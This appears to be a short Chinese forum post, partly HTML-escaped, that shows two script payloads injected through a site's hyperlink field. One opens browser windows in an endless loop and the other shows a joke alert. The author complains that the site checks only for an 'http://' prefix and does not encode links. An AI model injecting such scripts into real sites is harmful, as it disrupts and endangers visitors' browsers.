&lt;br&gt;&lt;a&nbsp;href=&quot;<a href="http://a<script>while(1)window.open(window.location)</script>"" target="_blank">http://a<script>while(1)window.open(window.location)</script>"</a>&nbsp;target=&quot;_blank&quot;&gt;&lt;/a&gt;
<br>&lt;br&gt;&lt;a&nbsp;href=&quot;<a href="http://a<script>alert(unescape('haha!%20a%20joke.'))</script>"" target="_blank">http://a<script>alert(unescape('haha!%20a%20joke.'))</script>"</a>&nbsp;target=&quot;_blank&quot;&gt;&lt;/a&gt;a经观察发现如上代码....看来插入超级链接时,NND只管是不是有http://前缀的...日
而且在显示该链接时,连编码都没有,也是直接显示出来的,我靠...这算什么嘛...垃圾代码一堆....